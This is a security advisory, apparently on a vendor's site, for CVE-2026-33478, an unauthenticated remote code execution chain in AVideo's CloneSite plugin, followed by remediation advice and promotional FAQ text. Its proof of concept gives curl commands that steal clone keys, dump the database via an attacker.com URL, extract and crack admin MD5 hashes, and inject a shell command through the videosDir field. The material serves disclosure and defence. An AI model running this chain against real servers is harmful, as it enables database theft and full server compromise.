Summary
Multiple vulnerabilities in AVideo's CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The clones.json.php endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via cloneServer.json.php. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in cloneClient.json.php to execute arbitrary system commands.
Details
Step 1: Clone Key Disclosure
plugin/CloneSite/clones.json.php:1-8 has zero authentication:
<?php
require_once '../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/CloneSite/Objects/Clones.php';
header('Content-Type: application/json');
$rows = Clones::getAll();
?>
{"data": <?php echo json_encode($rows); ?>}
The response includes the key field for every registered clone, which is the sole authentication credential for clone operations.
Step 2: Database Dump via Stolen Key
plugin/CloneSite/cloneServer.json.php:73-97, once the key passes Clones::thisURLCanCloneMe(), the server executes mysqldump and writes the result to a web-accessible directory:
$cmd = "mysqldump -u {$mysqlUser} -p'{$mysqlPass}' --host {$mysqlHost} "
." --default-character-set=utf8mb4 {$mysqlDatabase} {$tablesList} > $sqlFile";
exec($cmd . " 2>&1", $output, $return_val);
The SQL file path is returned in the JSON response and is downloadable.
Step 3: Admin Credential Extraction
objects/user.php:1798, passwords are stored as unsalted MD5:
$passEncoded = md5($pass);
The users table in the dump contains user, password (MD5), and isAdmin fields. MD5 hashes crack in seconds.
Step 4: Command Injection via Rsync
plugin/CloneSite/cloneClient.json.php:259, the videosDir from the clone server response is interpolated unsanitized into the rsync command:
$rsync = "sshpass -p '{password}' rsync -av ... {$objClone->cloneSiteSSHUser}@{$objClone->cloneSiteSSHIP}:{$json->videosDir} ...";
exec($cmd . " 2>&1", $output, $return_val);
An admin who controls a clone server (or an attacker who has become admin) can inject arbitrary commands via the videosDir field.
PoC
# Step 1: Steal clone keys (unauthenticated)
curl -s 'http://target/plugin/CloneSite/clones.json.php' | jq '.data[0].key'
# Output: "a1b2c3d4e5f6..."
# Step 2: Trigger database dump
CLONE_KEY="a1b2c3d4e5f6..."
curl -s "http://target/plugin/CloneSite/cloneServer.json.php" \
--data "url=http://attacker.com&key=${CLONE_KEY}&useRsync=0" | jq '.sqlFile'
# Output: "Clone_mysqlDump_1234567890.sql"
# Step 3: Download the dump and extract admin credentials
curl -s "http://target/videos/clones/Clone_mysqlDump_1234567890.sql" \
| grep -A2 "INSERT INTO.*users" \
| grep -oP "admin','[a-f0-9]{32}"
# Output: admin','5f4dcc3b5aa765d61d8327deb882cf99 (MD5 of "password")
# Step 4: Crack MD5 (trivial)
echo -n "5f4dcc3b5aa765d61d8327deb882cf99" | hashcat -m 0 -a 0 rockyou.txt
# Output: password
# Step 5: Login as admin, configure CloneSite with malicious server
# The attacker's clone server returns videosDir containing: /tmp$(id > /tmp/pwned)
# When rsync executes, the $(id) is evaluated by the shell
Impact
- Complete server compromise: Unauthenticated attacker achieves arbitrary command execution as the web server user
- Full database disclosure: The entire database (users, videos, configurations, secrets) is exfiltrated
- No user interaction: Every step is automated, no clicks or social engineering required
- Credential theft: All user passwords (MD5) are trivially recoverable
- Lateral movement: Database credentials and SSH credentials (stored encrypted in the plugins table) may enable access to other systems
Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.
CVE-2026-33478 has a CVSS score of 10.0 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
In the interim: Avoid passing untrusted input to shell commands. Use parameterized APIs or libraries that do not invoke a shell.
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-33478? CVE-2026-33478 is a critical-severity OS command injection vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- How severe is CVE-2026-33478? CVE-2026-33478 has a CVSS score of 10.0 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of wwbn/avideo are affected by CVE-2026-33478? wwbn/avideo (composer) versions <= 26.0 is affected.
- Is there a fix for CVE-2026-33478? No fixed version is listed for CVE-2026-33478 yet. Monitor the advisory for updates and apply mitigations in the interim.
- Is CVE-2026-33478 exploitable, and should I be worried? Whether CVE-2026-33478 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-33478 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-33478? No fixed version is listed yet. In the interim: Avoid passing untrusted input to shell commands. Use parameterized APIs or libraries that do not invoke a shell.